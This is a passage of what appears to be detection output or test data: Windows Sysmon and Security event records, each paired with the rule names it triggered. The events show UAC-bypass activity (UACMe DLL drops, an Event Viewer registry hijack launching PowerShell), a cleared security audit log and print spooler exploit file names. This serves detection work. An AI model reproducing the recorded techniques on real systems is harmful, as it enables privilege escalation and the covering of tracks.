Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-05-12 15:06:49.134","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK\\system32\\Clipup.exe","UtcTime":"2020-05-12 15:06:49.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":143175,"Execution":{"#attributes":{"ProcessID":2856,"ThreadID":3608}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-12T15:06:49.184059Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:54:02.305","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FE2A-5CD6-0000-00107E091700","ProcessId":2028,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:54:02.305"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15987,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:54:02.305766Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:54:07.462","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FE2F-5CD6-0000-001019201700","ProcessId":2956,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:54:07.462"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15989,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:54:07.524516Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"byeintegrity5-uac.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\privesc\\uac\\","Description":"?","FileVersion":"?","Hashes":"SHA1=DF21EC2A3D7EE2AE853C29CBD8AB774A78ED7BF4,MD5=8671D1F95CC31E33F61DEF8C99B42B64,SHA256=2D41A174EA0589F39AA267F829870131AE18CFF1B19648C118DC5A00AEAF078B,IMPHASH=EA12F696E9727F4454BA1EFA0CAFAD2D","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","IntegrityLevel":"Medium","LogonGuid":"00247C92-3404-5FBE-0000-002044CA0600","LogonId":"0x6ca44","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-BB27-5FBF-0000-0010F69CFA0A","ParentProcessId":12228,"ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"Product":"?","RuleName":"","TerminalSessionId":1,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-11-26 17:38:11.137"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2362764,"Execution":{"#attributes":{"ProcessID":5900,"ThreadID":6484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T17:38:11.138458Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-11-26 17:38:11.146","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetFilename":"C:\\Users\\Public\\tools\\privesc\\uac\\system32\\npmproxy.dll","UtcTime":"2020-11-26 17:38:11.146"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2362765,"Execution":{"#attributes":{"ProcessID":5900,"ThreadID":6484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T17:38:11.147605Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer","Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\Public\\tools\\privesc\\uac","EventType":"SetValue","Image":"C:\\Users\\Public\\tools\\privesc\\uac\\byeintegrity5-uac.exe","ProcessGuid":"00247C92-E803-5FBF-0000-0010D1B5B40C","ProcessId":11644,"RuleName":"","TargetObject":"HKU\\S-1-5-21-1586556212-2165235939-1437495523-1001\\Environment\\systemroot","UtcTime":"2020-11-26 17:38:11.151"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":13,"EventRecordID":2362767,"Execution":{"#attributes":{"ProcessID":5900,"ThreadID":6484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-11-26T17:38:11.152295Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:06:53.846","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-78DD-5D45-0000-0010B8A50301","ProcessId":5080,"RuleName":"PrivEsc - UAC Bypass UACME 23","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\dismcore.dll","UtcTime":"2019-08-03 12:06:53.846"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5429,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:06:53.933988Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-04 09:33:57.716","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A685-5D46-0000-00109B2AD703","ProcessId":3916,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-04 09:33:57.716"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5763,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T09:33:57.800853Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 15:08:06.372","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-A356-5D45-0000-001029AA9901","ProcessId":4480,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","UtcTime":"2019-08-03 15:08:06.372"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5527,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T15:08:06.419322Z"}},"Version":2}}}},{"detection":["Suspicious Driver Load from Temp"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Hazardous Environments","Description":"UACMe proxy DLL","FileVersion":"3.1.9.1905","Hashes":"SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847","Image":"C:\\Windows\\System32\\mmc.exe","ImageLoaded":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\pe386.dll","ProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ProcessId":4056,"Product":"UACMe","RuleName":"Execution - Image Loaded from suspicious path","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-08-03 15:08:07.340"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":5531,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":7,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T15:08:07.508962Z"}},"Version":3}}}},{"detection":["MMC Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\System32\\mmc.exe\" eventvwr.msc","ParentImage":"C:\\Windows\\System32\\mmc.exe","ParentProcessGuid":"747F3D96-A356-5D45-0000-001014F99901","ParentProcessId":4056,"ProcessGuid":"747F3D96-A357-5D45-0000-0010BD149A01","ProcessId":5396,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-03 15:08:07.355"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":5532,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T15:08:07.558917Z"}},"Version":5}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-88DC-5CD3-0000-00100DA51A00","ProcessId":2704,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000_CLASSES\\mscfile\\shell\\open\\command\\(Default)","UtcTime":"2019-05-09 01:59:28.669"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11112,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T01:59:28.669022Z"}},"Version":2}}}},{"detection":["UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-863B-5CD3-0000-00204A390100","LogonId":"0x1394a","ParentCommandLine":"\"C:\\Windows\\system32\\eventvwr.exe\" ","ParentImage":"C:\\Windows\\System32\\eventvwr.exe","ParentProcessGuid":"365ABB72-8980-5CD3-0000-00105F451F00","ParentProcessId":3884,"ProcessGuid":"365ABB72-8980-5CD3-0000-0010134D1F00","ProcessId":3840,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 01:59:28.903"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11116,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1904}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T01:59:29.090897Z"}},"Version":5}}}},{"detection":["(Built-in Logic) - Security audit log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"Security","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1102,"EventRecordID":161471,"Execution":{"#attributes":{"ProcessID":1276,"ThreadID":6720}},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":null,"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-15T18:04:36.333991Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"SubjectDomainName":"MSEDGEWIN10","SubjectLogonId":"0x52a7d","SubjectUserName":"IEUser","SubjectUserSid":"S-1-5-21-3461203602-4096304019-2269080069-1000"}}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 13:50:26.727","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-9122-5D45-0000-0010710D6101","ProcessId":3508,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\Fubuki.exe","UtcTime":"2019-08-03 13:50:26.727"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5518,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T13:50:26.782725Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:31:14.985","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-7E92-5D45-0000-0010FF472601","ProcessId":4884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\GdiPlus.dll","UtcTime":"2019-08-03 12:31:14.986"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5487,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:31:15.096244Z"}},"Version":2}}}},{"detection":["UAC Bypass Using Consent and Comctl32 - File","UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 12:08:13.721","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-792D-5D45-0000-00104F190601","ProcessId":5336,"RuleName":"PrivEsc - UAC Bypass UACME 22","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\comctl32.dll","UtcTime":"2019-08-03 12:08:13.721"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5438,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T12:08:13.818381Z"}},"Version":2}}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342291,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.551382Z"}},"Version":2}}}},{"detection":["Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342292,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.551399Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.533","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.DLL","UtcTime":"2020-08-12 13:04:27.533"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342293,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.551413Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRVUI.DLL","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342294,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562442Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\TTY.GPD","UtcTime":"2020-08-12 13:04:27.549"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":342295,"Execution":{"#attributes":{"ProcessID":3296,"ThreadID":4484}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-08-12T13:04:27.562798Z"}},"Version":2}}}},{"detection":["CVE-2021-1675 Print Spooler Exploitation Filename Pattern","Windows Spooler Service Suspicious File Deletion"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-08-12 13:04:27.549","Image":"C:\\Windows\\System32\\spoolsv.exe","ProcessGuid":"747F3D96-E8AB-5F33-0000-001057D13900","ProcessId":7700,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\spool\\drivers\\x64\\3\\New\\UNIDRV.HLP","UtcTime":"2020-08-12 